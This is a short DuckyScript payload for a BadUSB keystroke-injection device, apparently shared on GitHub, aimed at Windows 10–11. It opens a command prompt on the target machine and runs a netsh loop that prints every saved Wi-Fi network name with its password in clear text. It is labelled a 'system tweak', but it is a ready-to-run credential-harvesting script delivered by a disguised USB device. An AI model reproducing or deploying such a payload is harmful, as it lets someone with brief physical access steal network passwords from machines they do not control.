# This script shows the saved Wi-Fi password on screen
# (Works on any Win10 on which the Wi-Fi password has been entered at least once)
# If BadUSB does not work for you - Transfer the device to DeepSleep
# and then try to enable and run the script again.

REM ############################################
REM # Title    : SHOW WIFI PASSWORDS ON SCREEN |
REM # Author   : RXSEESH                       |
REM # Version  : FIXED                         |
REM # Category : SYSTEM TWEAKS                 |
REM # Target   : WINDOWS 10-11                 |
REM ############################################
REM   @guns.lol/RXSEESH | @github.com/RXSEESH
GUI r
DELAY 750
STRING cmd
DELAY 300
ENTER
DELAY 3000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
DELAY 150
ENTER
